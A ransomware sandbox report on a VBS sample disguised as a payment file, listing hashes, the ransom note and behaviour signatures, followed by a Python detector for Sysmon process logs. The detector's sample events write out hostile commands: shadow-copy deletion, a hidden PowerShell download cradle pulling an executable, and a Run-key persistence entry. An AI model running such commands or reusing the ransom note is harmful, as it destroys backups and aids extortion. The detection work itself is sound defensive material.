General

  • Target

    Payment_Activity_0037_2025-3-30.vbs

  • Size

    13KB

  • Sample

    250330-w6n9zatycw

  • MD5

    1666b10f8f85c81a689e60018dd65abf

  • SHA1

    40320e7700630bc0e35a11cc803cfa3ad46aa79b

  • SHA256

    eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31

  • SHA512

    0cae1de09fc3d46a02541a6f34c931e4748f06fbf0add8fa89caccf5a9cbd68d15871453e70320b8d4fc23b75191b984ff47f87ba8dcdada5765628356fb20bc

  • SSDEEP

    192:NB0v8qa258i+h6xp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyi0mdxoY6HyLjpLZlIyUQanKzN2v

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decrypt_files.txt

Ransom Note
ATTENTION! You can return your files! All your files are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and key. Do not try to recover your files without a decrypt tool or try to turn off your pc, this may damage your files making them making them impossible to recover. We advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :937CC8CA764AA78A070CDC80208FC56AD226E76957AD724BE0BB6FF4FD9C0427

Targets

    • Target

      Payment_Activity_0037_2025-3-30.vbs

    • Size

      13KB

    • MD5

      1666b10f8f85c81a689e60018dd65abf

    • SHA1

      40320e7700630bc0e35a11cc803cfa3ad46aa79b

    • SHA256

      eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31

    • SHA512

      0cae1de09fc3d46a02541a6f34c931e4748f06fbf0add8fa89caccf5a9cbd68d15871453e70320b8d4fc23b75191b984ff47f87ba8dcdada5765628356fb20bc

    • SSDEEP

      192:NB0v8qa258i+h6xp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyi0mdxoY6HyLjpLZlIyUQanKzN2v

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest (download cradle).

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Credentials from Password Stores: Windows Credential Manager

      Suspicious access to Credentials History.

    • Drops startup file

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Indicator Removal: File Deletion

      Adversaries may delete files left behind by the actions of their intrusion activity.

    • Legitimate hosting services abused for malware hosting/C2
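
The signatures above describe a chain that a process-creation log will show in full: the script host runs the VBS, spawns PowerShell with a web request, and the dropped executable then deletes shadow copies and writes a Run key. The following is an added detection example, not part of the sandbox report and not the sample's own code. It classifies Sysmon-style Event ID 1 records (ParentImage, Image, CommandLine) against the behaviours listed in the report; the events are constructed for illustration, and the download URL, dropped-file name and Run value name in them are hypothetical.

```python
"""Added example (not from the sandbox report): tag Sysmon-style
process-creation events with the behaviours the report lists.
All events, paths and URLs below are constructed for illustration."""
import re

# Constructed sample events: a WScript-launched downloader chain followed by
# inhibit-recovery and persistence actions, plus one benign event.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\Admin\Downloads\Payment_Activity_0037_2025-3-30.vbs"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"Invoke-WebRequest -Uri "
                    "'https://example.invalid/payload.exe' -OutFile $env:TEMP\\p.exe\""},
    {"ParentImage": r"C:\Users\Admin\AppData\Local\Temp\p.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"ParentImage": r"C:\Users\Admin\AppData\Local\Temp\p.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                    r'/v Updater /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\p.exe /f'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# Script hosts that should rarely, if ever, spawn a PowerShell download cradle.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")


def _basename(path):
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of report behaviours one event matches ([] if none)."""
    tags = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd_l = event.get("CommandLine", "").lower()

    # Deletes shadow copies: vssadmin, wmic, or PowerShell WMI deletion.
    if (image == "vssadmin.exe" and "delete" in cmd_l and "shadows" in cmd_l) \
            or (image == "wmic.exe" and "shadowcopy" in cmd_l and "delete" in cmd_l) \
            or re.search(r"win32_shadowcopy.*\.delete\(", cmd_l):
        tags.append("deletes_shadow_copies")

    # PowerShell web request; extra tag when a script host is the parent,
    # which is the VBS -> PowerShell -> MZ/PE download step in the report.
    if image in ("powershell.exe", "pwsh.exe") and re.search(
            r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", cmd_l):
        tags.append("powershell_web_request")
        if parent in SCRIPT_HOSTS:
            tags.append("script_host_spawns_downloader")

    # Adds Run key to start application (reg.exe writing ...\CurrentVersion\Run).
    if image == "reg.exe" and " add " in cmd_l and re.search(r"\\currentversion\\run\b", cmd_l):
        tags.append("run_key_persistence")
    return tags


def scan(events):
    """Map event index -> matched tags, omitting events that match nothing."""
    return {i: tags for i, ev in enumerate(events) if (tags := classify(ev))}


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, _basename(SAMPLE_EVENTS[idx]["Image"]), tags)
```

The parent/child check matters more than any single string: Invoke-WebRequest from an administrator's console is routine, but PowerShell started by wscript.exe with a download cradle, followed within minutes by vssadmin delete shadows from a file in %TEMP%, is the shape this report describes. Tune the regexes to your own telemetry; obfuscated or encoded PowerShell (-EncodedCommand) will not match the plain-text patterns here and needs decoding first.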

MITRE ATT&CK Enterprise v15

Tasks